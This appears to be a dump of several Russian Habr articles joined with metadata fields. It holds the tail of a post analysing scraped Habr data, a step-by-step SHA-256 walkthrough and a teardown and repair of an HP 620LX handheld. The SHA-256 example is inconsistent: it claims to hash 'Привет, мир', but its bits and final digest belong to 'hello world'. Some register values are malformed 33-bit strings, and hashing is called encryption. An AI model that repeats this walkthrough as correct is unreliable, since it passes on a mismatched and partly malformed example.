soup = BeautifulSoup(r.text, 'html5lib') # instead of html.parser
doc = {}
doc['id'] = pid
if not soup.find("span", {"class": "post__title-text"}):
# такое бывает, если статья не существовала или удалена
doc['status'] = 'title_not_found'
else:
doc['status'] = 'ok'
doc['title'] = soup.find("span", {"class": "post__title-text"}).text
doc['text'] = soup.find("div", {"class": "post__text"}).text
doc['time'] = soup.find("span", {"class": "post__time"}).text
# create other fields: hubs, tags, views, comments, votes, etc.
# ...
# сохранение результата в отдельный файл
fname = r'files/' + str(pid) + '.pkl'
with open(fname, 'wb') as f:
pickle.dump(doc, f)
```
В процессе парсинга открыл для себя несколько новых моментов.
Во-первых, говорят, что создавать больше процессов, чем ядер в процессоре, бесполезно. Но в моём случае оказалось, что лимитирующий ресурс — не процессор, а сеть, и 100 процессов отрабатывают быстрее, чем 4 или, скажем, 20.
Во-вторых, в некоторых постах встречались сочетания спецсимволов — например, эвфемизмы типа "%&#@". Оказалось, что `html.parser`, который я использовал сначала, реагирует на комбинацию `&#</code> болезненно, считая её началом html-сущности. Я уж было собирался творить чёрную магию, но на форуме подсказали, что можно просто поменять парсер.</p><br/>
<p>В-третьих, мне удалось выгрузить все публикации, кроме трёх. Документы под номерами 65927, 162075, и 275987 моментально удалил мой антивирус. Это статьи соответственно про цепочку джаваскриптов, загружающую зловредный pdf, SMS-вымогатель в виде набора плагинов для браузеров, и сайт CrashSafari.com, который отправляет айфоны в перезагрузку. Ещё одну статью антивирь обнаружил позднее, во время скана системы: пост 338586 про скрипты на сайте зоомагазина, использующие процессор пользователя для майнинга криптовалюты. Так что можно считать работу антивируса вполне адекватной. </p><br/>
<p>"Живых" статей оказалась только половина от потенциального максимума — 166307 штук. Про остальные Хабр даёт варианты "страница устарела, была удалена или не существовала вовсе". Что ж, всякое бывает. </p><br/>
<p>За выгрузкой статей последовала техническая работа: например, даты публикации нужно было перевести из формата "'21 декабря 2006 в 10:47" в стандартный <code>datetime</code>, а "12,8k" просмотров — в 12800. На этом этапе вылезло ещё несколько казусов. Самый весёлый связан с подсчётом голосов и типами данных: в некоторых старых постах произошло переполнение инта, и они получили по 65535 голосов.</p><br/>
<img src="https://habrastorage.org/r/w1560/webt/ga/a1/0x/gaa10x2xrj6cz9y5mjouf6qghaw.png" width="240" data-src="https://habrastorage.org/webt/ga/a1/0x/gaa10x2xrj6cz9y5mjouf6qghaw.png"/><br/>
<p>В результате тексты статей (без картинок) заняли у меня 1.5 гигабайта, комментарии с метаинформацией — ещё 3, и около сотни мегабайт — метаинформация о статьях. Такое можно полностью держать в оперативной памяти, что было для меня приятной неожиданностью. </p><br/>
<p>Начал анализ статей я не с самих текстов, а с метаинформации: дат, тегов, хабов, просмотров и "лайков". Оказалось, что и она может многое поведать. </p><br/>
<h2 id="trendy-razvitiya-habrahabra">Тренды развития Хабрахабра</h2><br/>
<p>Статьи на сайте публикуются с 2006 года; наиболее интенсивно — в 2008-2016 годах. </p><br/>
<img src="https://habrastorage.org/r/w1560/webt/5x/xq/wy/5xxqwy0ozkxidpiunlp59wzstzm.png" width="360" data-src="https://habrastorage.org/webt/5x/xq/wy/5xxqwy0ozkxidpiunlp59wzstzm.png"/><br/>
<p>Насколько активно эти статьи читали в разное время, оценить не так просто. Тексты 2012 года и младше более активно комментировали и рейтинговали, но у более новых текстов больше просмотров и добавлений в закладки. Одинаково вели себя (вдвое упали) эти метрики только однажды, в 2015 году. Возможно, в ситуации экономического и политического кризиса внимание читателей перешло с айтишных блогов к более болезненным вопросам. </p><br/>
<img src="https://habrastorage.org/r/w1560/webt/ka/tl/nh/katlnhwb2odlxk3p6uccsqwldcw.png" width="360" data-src="https://habrastorage.org/webt/ka/tl/nh/katlnhwb2odlxk3p6uccsqwldcw.png"/><br/>
<p>Кроме самих статей, я выкачал ещё комментарии к ним. Комментариев получилось 6 миллионов, правда, 240 тысяч из них оказались забаненными ("нло прилетело и опубликовало эту надпись здесь"). Полезное свойство комментариев в том, что для них указано время. Изучая время комментариев, можно примерно понять и то, когда вообще статьи читают. </p><br/>
<p>Оказалось, что большую часть статей и пишут, и комментируют где-то с 10 до 20 часов, т.е. в типичный московский рабочий день. Это может значить и что Хабр читают в профессиональных целях, и что это хороший способ прокрастинации на работе. Кстати, это распределение времени суток стабильно с самого основания Хабра до сегодняшнего дня. </p><br/>
<img src="https://habrastorage.org/r/w1560/webt/ck/zv/vu/ckzvvuqwr1mnhs_0hvvw0qdaqqs.png" width="360" data-src="https://habrastorage.org/webt/ck/zv/vu/ckzvvuqwr1mnhs_0hvvw0qdaqqs.png"/><br/>
<p>Однако основная польза от метки времени комментария — не время суток, а срок "активной жизни" статьи. Я подсчитал, как распределено время от публикации статьи до её комментария. Оказалось, что сейчас медианный комментарий (зелёная линия) приходит примерно через 20 часов, т.е. в первые сутки после публикации оставляют в среднем чуть больше половины всех комментариев к статье. А за двое суток оставляют 75% всех комментариев. При этом раньше статьи читали ещё быстрее — так, в 2010 году половина комментариев приходила уже в первые 6 часов. </p><br/>
<img src="https://habrastorage.org/r/w1560/webt/ce/gj/k9/cegjk9fpdcpi7gqijes6dpzvwle.png" width="360" data-src="https://habrastorage.org/webt/ce/gj/k9/cegjk9fpdcpi7gqijes6dpzvwle.png"/><br/>
<p>Для меня стало сюрпризом, что комментарии удлинились: среднее количество символов в комментарии за время существования Хабра выросло почти вдвое!</p><br/>
<img src="https://habrastorage.org/r/w1560/webt/fn/ay/jl/fnayjlfpsyf3vf2wsj8vyb5g2hm.png" width="360" data-src="https://habrastorage.org/webt/fn/ay/jl/fnayjlfpsyf3vf2wsj8vyb5g2hm.png"/><br/>
<p>Более простая обратная связь, чем комментарии — это голоса. В отличие от многих других ресурсов, на Хабре можно ставить не только плюсы, но и минусы. Впрочем, последней возможностью читатели пользуются не так часто: текущая доля дизлайков составляет около 15% от всех отданных голосов. Раньше было больше, но со временем читатели подобрели. </p><br/>
<img src="https://habrastorage.org/r/w1560/webt/k3/_t/je/k3_tjevzru_8-tez48n0zh-hiog.png" width="360" data-src="https://habrastorage.org/webt/k3/_t/je/k3_tjevzru_8-tez48n0zh-hiog.png"/><br/>
<p>Менялись со временем и сами тексты. Например, типичная длина текста не прекращает устойчиво расти с самого запуска сайта, несмотря на кризисы. За десятилетие тексты стали почти в десять раз длиннее!</p><br/>
<img src="https://habrastorage.org/r/w1560/webt/0q/ji/cp/0qjicpigcx6k2aeyeak0ob-wny0.png" width="360" data-src="https://habrastorage.org/webt/0q/ji/cp/0qjicpigcx6k2aeyeak0ob-wny0.png"/><br/>
<p>Стилистика текстов (в первом приближении) тоже менялась. За первые годы существования Хабра, например, выросла доля кода и чисел в текстах:</p><br/>
<img src="https://habrastorage.org/r/w1560/webt/v3/wo/lw/v3wolwgn1nycharjflckycowj94.png" width="720" data-src="https://habrastorage.org/webt/v3/wo/lw/v3wolwgn1nycharjflckycowj94.png"/><br/>
<p>Разобравшись с общей динамикой сайта, я решил измерить, как менялась популярность различных тем. Темы можно выделять из текстов автоматически, но для начала можно не изобретать велосипед, а воспользоваться готовыми тегами, проставленными авторами каждой статьи. Четыре типичных тренда я вывел на графике. Тема "Google" изначально доминировала (возможно, в основном в связи с SEO-оптимизацией), но с каждым годом теряла вес. Javascript был популярной темой и продолжает постепенно, а вот машинное обучение начало стремительно набирать популярность лишь в последние годы. Linux же остаётся одинаково актуальным на протяжении всего десятилетия. </p><br/>
<img src="https://habrastorage.org/r/w1560/webt/vx/s5/yy/vxs5yy1ojnjf4hlufmoi4j9fsve.png" width="360" data-src="https://habrastorage.org/webt/vx/s5/yy/vxs5yy1ojnjf4hlufmoi4j9fsve.png"/><br/>
<p>Конечно же, мне стало интересно, какие темы привлекают больше читательской активности. Я подсчитал медианное число просмотров, голосов и комментов в каждой теме. Вот что получилось:</p><br/>
<ul>
<li>Самые просматриваемые темы: arduino, веб-дизайн, веб-разработка, дайджест, ссылки, css, html, html5, nginx, алгоритмы. </li>
<li>Самые "лайкабельные" темы: вконтакте, юмор, jquery, opera, c, html, веб-разработка, html5, css, веб-дизайн. </li>
<li>Самые обсуждаемые темы: opera, skype, фриланс, вконтакте, ubuntu, работа, nokia, nginx, arduino, firefox. </li>
</ul><br/>
<p>Кстати, раз уж я сравниваю темы, можно сделать их рейтинг по частоте (и сравнить результаты с <a href="http://habrahabr.ru/post/197308/" rel="nofollow noopener noreferrer">аналогичной статьёй от 2013 года</a>). </p><br/>
<ul>
<li>За все годы существования Хабра самыми популярными тегами (в порядке убывания) стали google, android, javascript, microsoft, linux, php, apple, java, python, программирование, стартапы, разработка, ios, стартап, социальные сети</li>
<li>В 2017 году наиболее популярны были javascript, python, java, android, разработка, linux, c++, программирование, php, c#, ios, машинное обучение, информационная безопасность, microsoft, react</li>
</ul><br/>
<p>При сравнении этих рейтингов можно обратить внимание, например, на победоносное шествие Питона и вымирание php, или на "закат" стартаперской тематики и взлёт машинного обучения.</p><br/>
<p>Не все теги на Хабре имеют столь очевидную тематическую окраску. Вот, например, десяток тегов, которые встречались всего лишь один раз, но просто показались мне забавными. Итак: "идея движитель прогресса", "загрузка с образа дискеты", "штат айова", "драматургия", "супералеша", "паровой двигатель", "чем заняться в субботу", "у меня лисица в мясорубке", "а получилось как всегда", "смешных тэгов придумать не удалось". Чтобы определить тематику таких статей, тегов недостаточно — придётся осуществлять тематическое моделирование над текстами статей. </p><br/>
<p>Более подробный анализ содержания статей будет в следующем посте. Во-первых, я собираюсь построить модель, прогнозирующую количество просмотров статьи в зависимости от её содержания. Во-вторых, хочется научить нейросеть генерировать тексты в той же стилистике, что и у авторов Хабра. Так что подписывайтесь :)</p><br/>
<p>P.S. А вот и запикленный <a href="https://yadi.sk/d/JV5S4nUKUrkzsA" rel="nofollow noopener noreferrer">датасет</a> и <a href="https://disk.yandex.ru/d/xv-opls6-7Yisg" rel="nofollow noopener noreferrer">аналог в jsonlines (без комментариев)</a>.</p></div>` | https://habr.com/ru/post/346198/ | null | ru | null |
# «Привет, мир»: разбираем каждый шаг хэш-алгоритма SHA-256

SHA-2 (Secure Hash Algorithm), в семейство которого входит SHA-256, — это один самых известных и часто используемых алгоритмов хэширования. В тексте подробно покажем каждый шаг работы этого алгоритма на реальном примере. SHA-2 отличается безопасностью (его тяжелее взломать, чем SHA-1) и скоростью.
Что такое хэш-функция?
----------------------
Три основных цели хэш-функций:
* Детерминировано шифровать данные (такой вид шифрования всегда создает одно и то же зашифрованное значение для одного и того же текстового значения);
* Принимать ввод любой длины, а выводить результат фиксированной длины;
* Изменять данные необратимо. Ввод нельзя получить из вывода.
SHA-2 выполняет их в полной мере. Если хотите узнать больше о хэш-функциях, на Хабре есть несколько подходящих публикаций. Например, статьи [«Что такое хэширование? Под капотом блокчейна»](https://habr.com/ru/post/345740/) и [«Хэш-алгоритмы»](https://habr.com/ru/post/93226/).
SHA-256 «Привет, мир»
---------------------
### Шаг 1 — Предварительная работа
Преобразуем «Привет, мир» в двоичный код:
```
01101000 01100101 01101100 01101100 01101111 00100000 01110111 01101111
01110010 01101100 01100100
```
Добавим 1:
```
01101000 01100101 01101100 01101100 01101111 00100000 01110111 01101111
01110010 01101100 01100100 1
```
Дополните код нулями, пока данные не станут равны 512 бит, минус 64 бита (в результате 448 бит):
```
01101000 01100101 01101100 01101100 01101111 00100000 01110111 01101111
01110010 01101100 01100100 10000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
```
Добавьте 64 бита в конец в виде целого числа с порядком байтов от старшего к младшему (big-endian), представляющего длину входного сообщения в двоичном формате. В нашем случае это 88, или «1011000».
```
01101000 01100101 01101100 01101100 01101111 00100000 01110111 01101111
01110010 01101100 01100100 10000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000 00000000 00000000 01011000
```
Теперь у нас есть ввод, который будет делиться на 512 без остатка.
### Шаг 2 — Инициализируйте значения хэша (h)
Теперь мы создаем 8 хэш-значений. Это жестко запрограммированные константы, которые представляют собой первые 32 бита дробных частей квадратных корней из первых восьми простых чисел: 2, 3, 5, 7, 11, 13, 17, 19.
```
h0 := 0x6a09e667
h1 := 0xbb67ae85
h2 := 0x3c6ef372
h3 := 0xa54ff53a
h4 := 0x510e527f
h5 := 0x9b05688c
h6 := 0x1f83d9ab
h7 := 0x5be0cd19
```
### Шаг 3 — Инициализация округленных констант (k)
Как и в предыдущем шаге, мы создадим еще несколько констант. На этот раз их будет 64. Каждое значение (0—63) представляет собой первые 32 бита дробных частей кубических корней первых 64 простых чисел (2—311).
```
0x428a2f98 0x71374491 0xb5c0fbcf 0xe9b5dba5 0x3956c25b 0x59f111f1 0x923f82a4 0xab1c5ed5
0xd807aa98 0x12835b01 0x243185be 0x550c7dc3 0x72be5d74 0x80deb1fe 0x9bdc06a7 0xc19bf174
0xe49b69c1 0xefbe4786 0x0fc19dc6 0x240ca1cc 0x2de92c6f 0x4a7484aa 0x5cb0a9dc 0x76f988da
0x983e5152 0xa831c66d 0xb00327c8 0xbf597fc7 0xc6e00bf3 0xd5a79147 0x06ca6351 0x14292967
0x27b70a85 0x2e1b2138 0x4d2c6dfc 0x53380d13 0x650a7354 0x766a0abb 0x81c2c92e 0x92722c85
0xa2bfe8a1 0xa81a664b 0xc24b8b70 0xc76c51a3 0xd192e819 0xd6990624 0xf40e3585 0x106aa070
0x19a4c116 0x1e376c08 0x2748774c 0x34b0bcb5 0x391c0cb3 0x4ed8aa4a 0x5b9cca4f 0x682e6ff3
0x748f82ee 0x78a5636f 0x84c87814 0x8cc70208 0x90befffa 0xa4506ceb 0xbef9a3f7 0xc67178f2
```
### Шаг 4 — Цикл фрагментов
Следующие шаги будут выполняться для каждого 512-битного «фрагмента» из наших входных данных. Поскольку фаза «Привет, мир» короткая, у нас есть только один фрагмент. В каждой итерации цикла мы будем изменять хэш-значения h0-h7, что приведет нас к конечному результату.
### Шаг 5 — Созданием расписание сообщений (w)
Скопируйте входные данные из шага 1 в новый массив, где каждая запись представляет собой 32-битное слово:
```
01101000011001010110110001101100 01101111001000000111011101101111
01110010011011000110010010000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000001011000
```
Добавьте еще 48 слов, инициализированных нулем, чтобы у нас получился массив w [0… 63]
```
01101000011001010110110001101100 01101111001000000111011101101111
01110010011011000110010010000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000001011000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
...
...
00000000000000000000000000000000 00000000000000000000000000000000
```
Измените обнуленные индексы в конце массива, используя следующий алгоритм:
Для **i** из w[16…63]:
* s0 = (w[i-15] rightrotate 7) xor (w[i-15] rightrotate 18) xor (w[i-15] rightshift 3)
* s1 = (w[i- 2] rightrotate 17) xor (w[i- 2] rightrotate 19) xor (w[i- 2] rightshift 10)
* w[i] = w[i-16] + s0 + w[i-7] + s1
Теперь посмотрим, как это работает для w [16]:
```
w[1] rightrotate 7:
01101111001000000111011101101111 -> 11011110110111100100000011101110
w[1] rightrotate 18:
01101111001000000111011101101111 -> 00011101110110111101101111001000
w[1] rightshift 3:
01101111001000000111011101101111 -> 00001101111001000000111011101101
s0 = 11011110110111100100000011101110 XOR 00011101110110111101101111001000 XOR 00001101111001000000111011101101
s0 = 11001110111000011001010111001011
w[14] rightrotate 17:
00000000000000000000000000000000 -> 00000000000000000000000000000000
w[14] rightrotate19:
00000000000000000000000000000000 -> 00000000000000000000000000000000
w[14] rightshift 10:
00000000000000000000000000000000 -> 00000000000000000000000000000000
s1 = 00000000000000000000000000000000 XOR 00000000000000000000000000000000 XOR 00000000000000000000000000000000
s1 = 00000000000000000000000000000000
w[16] = w[0] + s0 + w[9] + s1
w[16] = 01101000011001010110110001101100 + 11001110111000011001010111001011 + 00000000000000000000000000000000 + 00000000000000000000000000000000
// addition is calculated modulo 2^32
w[16] = 00110111010001110000001000110111
```
В расписании сообщений осталось 64 слова (w):
```
01101000011001010110110001101100 01101111001000000111011101101111
01110010011011000110010010000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000000000000
00000000000000000000000000000000 00000000000000000000000001011000
00110111010001110000001000110111 10000110110100001100000000110001
11010011101111010001000100001011 01111000001111110100011110000010
00101010100100000111110011101101 01001011001011110111110011001001
00110001111000011001010001011101 10001001001101100100100101100100
01111111011110100000011011011010 11000001011110011010100100111010
10111011111010001111011001010101 00001100000110101110001111100110
10110000111111100000110101111101 01011111011011100101010110010011
00000000100010011001101101010010 00000111111100011100101010010100
00111011010111111110010111010110 01101000011001010110001011100110
11001000010011100000101010011110 00000110101011111001101100100101
10010010111011110110010011010111 01100011111110010101111001011010
11100011000101100110011111010111 10000100001110111101111000010110
11101110111011001010100001011011 10100000010011111111001000100001
11111001000110001010110110111000 00010100101010001001001000011001
00010000100001000101001100011101 01100000100100111110000011001101
10000011000000110101111111101001 11010101101011100111100100111000
00111001001111110000010110101101 11111011010010110001101111101111
11101011011101011111111100101001 01101010001101101001010100110100
00100010111111001001110011011000 10101001011101000000110100101011
01100000110011110011100010000101 11000100101011001001100000111010
00010001010000101111110110101101 10110000101100000001110111011001
10011000111100001100001101101111 01110010000101111011100000011110
10100010110101000110011110011010 00000001000011111001100101111011
11111100000101110100111100001010 11000010110000101110101100010110
```
### Шаг 6 — Сжатие
Инициализируйте переменные **a, b, c, d, e, f, g, h** и установите их равными текущим значениям хэш-функции соответственно **h0, h1, h2, h3, h4, h5, h6, h7**.
Запустите цикл сжатия, который изменит значения **a… h**. Выглядит он следующим образом:
Для **i** от 0 до 63
* S1 = (e rightrotate 6) xor (e rightrotate 11) xor (e rightrotate 25)
* ch = (e and f) xor ((not e) and g)
* temp1 = h + S1 + ch + k[i] + w[i]
* S0 = (a rightrotate 2) xor (a rightrotate 13) xor (a rightrotate 22)
* maj = (a and b) xor (a and c) xor (b and c)
* temp2 := S0 + maj
* h = g
* g = f
* e = d + temp1
* d = c
* c = b
* b = a
* a = temp1 + temp2
Совершим первую итерацию, сложение вычисляется по модулю 2 ^ 32:
```
a = 0x6a09e667 = 01101010000010011110011001100111
b = 0xbb67ae85 = 10111011011001111010111010000101
c = 0x3c6ef372 = 00111100011011101111001101110010
d = 0xa54ff53a = 10100101010011111111010100111010
e = 0x510e527f = 01010001000011100101001001111111
f = 0x9b05688c = 10011011000001010110100010001100
g = 0x1f83d9ab = 00011111100000111101100110101011
h = 0x5be0cd19 = 01011011111000001100110100011001
e rightrotate 6:
01010001000011100101001001111111 -> 11111101010001000011100101001001
e rightrotate 11:
01010001000011100101001001111111 -> 01001111111010100010000111001010
e rightrotate 25:
01010001000011100101001001111111 -> 10000111001010010011111110101000
S1 = 11111101010001000011100101001001 XOR 01001111111010100010000111001010 XOR 10000111001010010011111110101000
S1 = 00110101100001110010011100101011
e and f:
01010001000011100101001001111111
& 10011011000001010110100010001100 =
00010001000001000100000000001100
not e:
01010001000011100101001001111111 -> 10101110111100011010110110000000
(not e) and g:
10101110111100011010110110000000
& 00011111100000111101100110101011 =
00001110100000011000100110000000
ch = (e and f) xor ((not e) and g)
= 00010001000001000100000000001100 xor 00001110100000011000100110000000
= 00011111100001011100100110001100
// k[i] is the round constant
// w[i] is the batch
temp1 = h + S1 + ch + k[i] + w[i]
temp1 = 01011011111000001100110100011001 + 00110101100001110010011100101011 + 00011111100001011100100110001100 + 1000010100010100010111110011000 + 01101000011001010110110001101100
temp1 = 01011011110111010101100111010100
a rightrotate 2:
01101010000010011110011001100111 -> 11011010100000100111100110011001
a rightrotate 13:
01101010000010011110011001100111 -> 00110011001110110101000001001111
a rightrotate 22:
01101010000010011110011001100111 -> 00100111100110011001110110101000
S0 = 11011010100000100111100110011001 XOR 00110011001110110101000001001111 XOR 00100111100110011001110110101000
S0 = 11001110001000001011010001111110
a and b:
01101010000010011110011001100111
& 10111011011001111010111010000101 =
00101010000000011010011000000101
a and c:
01101010000010011110011001100111
& 00111100011011101111001101110010 =
00101000000010001110001001100010
b and c:
10111011011001111010111010000101
& 00111100011011101111001101110010 =
00111000011001101010001000000000
maj = (a and b) xor (a and c) xor (b and c)
= 00101010000000011010011000000101 xor 00101000000010001110001001100010 xor 00111000011001101010001000000000
= 00111010011011111110011001100111
temp2 = S0 + maj
= 11001110001000001011010001111110 + 00111010011011111110011001100111
= 00001000100100001001101011100101
h = 00011111100000111101100110101011
g = 10011011000001010110100010001100
f = 01010001000011100101001001111111
e = 10100101010011111111010100111010 + 01011011110111010101100111010100
= 00000001001011010100111100001110
d = 00111100011011101111001101110010
c = 10111011011001111010111010000101
b = 01101010000010011110011001100111
a = 01011011110111010101100111010100 + 00001000100100001001101011100101
= 01100100011011011111010010111001
```
Все вычисления выполняются еще 63 раза, меняя переменные a-h. К счастью, мы не делаем это вручную. В итоге мы получили:
```
h0 = 6A09E667 = 01101010000010011110011001100111
h1 = BB67AE85 = 10111011011001111010111010000101
h2 = 3C6EF372 = 00111100011011101111001101110010
h3 = A54FF53A = 10100101010011111111010100111010
h4 = 510E527F = 01010001000011100101001001111111
h5 = 9B05688C = 10011011000001010110100010001100
h6 = 1F83D9AB = 00011111100000111101100110101011
h7 = 5BE0CD19 = 01011011111000001100110100011001
a = 4F434152 = 001001111010000110100000101010010
b = D7E58F83 = 011010111111001011000111110000011
c = 68BF5F65 = 001101000101111110101111101100101
d = 352DB6C0 = 000110101001011011011011011000000
e = 73769D64 = 001110011011101101001110101100100
f = DF4E1862 = 011011111010011100001100001100010
g = 71051E01 = 001110001000001010001111000000001
h = 870F00D0 = 010000111000011110000000011010000
```
### Шаг 7 — Измените окончательные значения
После цикла сжатия, во время цикла фрагментов, мы изменяем хеш-значения, добавляя к ним соответствующие переменные a-h. Как и ранее, все сложение производится по модулю 2 ^ 32:
```
h0 = h0 + a = 10111001010011010010011110111001
h1 = h1 + b = 10010011010011010011111000001000
h2 = h2 + c = 10100101001011100101001011010111
h3 = h3 + d = 11011010011111011010101111111010
h4 = h4 + e = 11000100100001001110111111100011
h5 = h5 + f = 01111010010100111000000011101110
h6 = h6 + g = 10010000100010001111011110101100
h7 = h7 + h = 11100010111011111100110111101001
```
### Шаг 8 — Финальный хэш
Наконец, соединяем все вместе.
```
digest = h0 append h1 append h2 append h3 append h4 append h5 append h6 append h7
= B94D27B9934D3E08A52E52D7DA7DABFAC484EFE37A5380EE9088F7ACE2EFCDE9
```
Мы прошли каждый шаг (за исключением нескольких итераций) SHA-256 в подробностях. Если хотите увидеть весь путь, что мы совершили, в форме псевдокода, заходите на [WikiPedia.](https://en.wikipedia.org/wiki/SHA-2)
[](https://slc.tl/eGGEc) | https://habr.com/ru/post/530262/ | null | ru | null |
# Легенды на SH-3
Приветствую всех!
Думаю, многие из нас хоть раз слышали о клавиатурных КПК. И как-то так получилось, что едва ли не самым узнаваемым аппаратом подобного класса стал HP Jornada 720.

Но сегодня речь пойдёт о других, более старых устройствах, оснащённых процессором иной архитектуры.
В ходе статьи узнаем, на что способны подобные девайсы, где найти софт для них, что примечательного в них есть, а также ещё много чего интересного.
❯ О чём я?
----------
Так уж вышло, что самыми популярными в мире КПК-фанатов клавиатурными девайсами стали, вне всякого сомнения, HP Jornada 720 и Psion 5mx. Оба аппарата в своём роде уникальны, имеют свои достоинства и недостатки и, конечно, своих фанатов. И оба из них работают на базе процессора архитектуры ARM. Немало информации по ним выпустили [dlinyj](https://habr.com/ru/users/dlinyj/) (на Хабре) и [BOOtak](https://habr.com/ru/users/bootak/) (на своём [канале](https://www.youtube.com/@kogdazjasdohnu)).
Сегодня же мы поговорим о несколько более древних экземплярах, работающих на процессоре архитектуры SuperH.
❯ HP 620LX
----------
Исторически сложилось, что клавиатурные КПК HP выпускались под серией LX. Это один из последних её представителей, работающий на базе ОС Windows CE 2.0.

Этот экземпляр стал первым клавиатурным КПК в моей коллекции. Пару лет назад наткнулся я на вторичке на объявление с очень «вкусной» ценой. Девайс был куплен без промедления, интереса ради. Даже упоминание того, что он в неизвестном состоянии, меня не остановило, как, впрочем, и посредственная комплектация: док-станция, кабель для подключения к компьютеру, блок питания, стилус и лоток для карты памяти CompactFlash были утеряны. Серьёзно, прежний обладатель устройства умудрился утратить почти всё, что можно без отвёртки отделить от данного девайса. Хорошо хоть аккумулятор и крышка отсека батарейки CR2032 были на месте. Спустя пару недель ожидания отправки девайса продавцом и доставки посылки, он таки оказался в моих руках. Свершилось? Ну что же, давайте посмотрим.
Блок питания не совсем стандартный, вместо традиционного 5,5\*2,5 стоит 4,75\*1,7 (такой же разъём использовался у ноутбуков Compaq, когда их купила HP, но по инерции продолжала выпускать аппараты под этой маркой). Ну хоть питание — обычные двенадцать вольт. В щедрых закромах Родины отыскался блок питания от нетбука с такими же характеристиками. Втыкаю разъём, жму кнопку включения… и ничего. Чёрный экран и отсутствие какой-либо реакции. Хм. Может, аккумулятор помер и ушёл в КЗ? Да не, без него тоже не хочет… И вставка резервной батарейки тоже не помогла, да и нажатие RESET тоже ни к чему не приводит. Что бы я ни делал, аппарат героически прикидывался кирпичом и не реагировал ни на нажатие кнопок, ни на постукивание об стену. Разочарованию моему не было предела. КПК был закинут в коробку со всяким компьютерным хламом, где провалялся так пару месяцев в ожидании лучших времён.
И эти времена для него таки настали. Позже я решил, что КПК надо восстановить во что бы то ни стало. Для начала разобрал его и измерил напряжения. Выяснилось, что по линии 3,3 В подозрительно низкое сопротивление, а напряжение на ней при запуске не поднимается. Потребление статичное и очень маленькое. Стал разбираться, что может просаживать эту линию. Под подозрение попали все крупные конденсаторы, которые были мною добросовестно отпаяны и проверены на предмет пробития. Но все они были исправны. С ужасом подумал, что отдала концы какая-то из микросхем. На тот момент я даже не подозревал, насколько я близок к истине.
Подозрения пали на микросхему DC-DC преобразователя **LTC1265CS-3.3**. Она как-то подозрительно грелась. Очень слабо, если быть точным, даже пальцем еле-еле чувствовалось. Но если учесть, что преобразователь, по идее, работает вхолостую, что-то тут было нечисто. Отпаял микруху, для проверки подкинул 3,3 В от обычного компьютерного блока питания. Двенадцать вольт подал от него же. Пробный запуск, и… загорелась зелёная лампочка, экран мигнул, а на нём появился логотип Hewlett-Packard. Аппарат ожил! Причина оказалась крайне банальной — померла **LTC1265CS-3.3**. В тот момент я почувствовал себя самым счастливым если не в мире, то в радиусе пяти километров точно.
Ну что же, перейдём к осмотру?

Девайс изготовлен из чёрного пластика, успевшего многое повидать на своём коротком веку. Логотипы Hewlett-Packard и Windows CE. Кнопочка, по умолчанию открывающая диктофон, а также служащая индикатором зарядки. Девайс увесистый (где-то полкило), приятно оттягивает руку и создаёт впечатление качественно сделанного устройства.

Экран весьма большой, разрешением 640\*240. Впрочем, выполнен он по технологии CSTN, отчего по отзывчивости, цветопередаче и углам обзора ничем не отличается от дисплеев ноутбуков середины девяностых (к слову говоря, отличить такой экран можно даже не глядя на него: если у ноута есть регулятор контрастности, скорее всего, это именно оно) или первых цветных кнопочных телефонов. Проще говоря — они тут никакие. Но, чего скрывать, это вносит свою долю ламповости. В правой части небольшая сенсорная панель. Датчиком закрытия крышки КПК не оснащён.
Клавиатура по ощущениям напоминает таковую у некоторых советских калькуляторов (в частности, Б3-35. Правда, тут ход клавиш несколько мягче). Слева вверху кнопка включения и кнопка начала диктофонной записи. Далее идёт псевдосенсорная панель с плёночными кнопками быстрого запуска. А заодно и кнопка выброса стилуса, который у моего экземпляра давно потерян.

Слева слот для карт PCMCIA и кнопка извлечения.

Справа пустующий отсек для стилуса, слот для Compact Flash (куда вставляется специальный лоток с картой внутри, тоже давно потерянный), разъём питания и проприетарный порт для связи с ПК. Сзади ничего интересного, только лишь окошко инфракрасного порта.

Снизу аккумулятор и его защёлка. контакты док-станции, отсек для резервной батареи.

Отсек в открытом виде. Видна красная кнопочка Reset.

Разбираем. Для этого снимаем крышку резервной батарейки, извлекаем саму батарейку. Снимаем основной аккумулятор. Откручиваем два крайних правых винта в аккумуляторном отсеке (не трогайте левые два, они держат петли, а не крышку!), один из которых под пломбой. Подцепляем правый нижний угол наклейки и выкручиваем ещё один винт. Всё, можно снимать крышку. На плате отчётливо видны процессор SH-3 с частотой 75 МГц, модуль памяти, где установлены микросхемы ОЗУ и ПЗУ. Заменой этого модуля можно было провести апгрейд машинки (а его утрата превращает её в кирпич). Под его слотом та самая злополучная микросхема **LTC1265CS-3.3**. Справа вверху экранный шлейф.

Обратная сторона платы. Видны слоты Compact Flash и PCMCIA, немного дискретных элементов. Внизу шлейф клавиатуры.
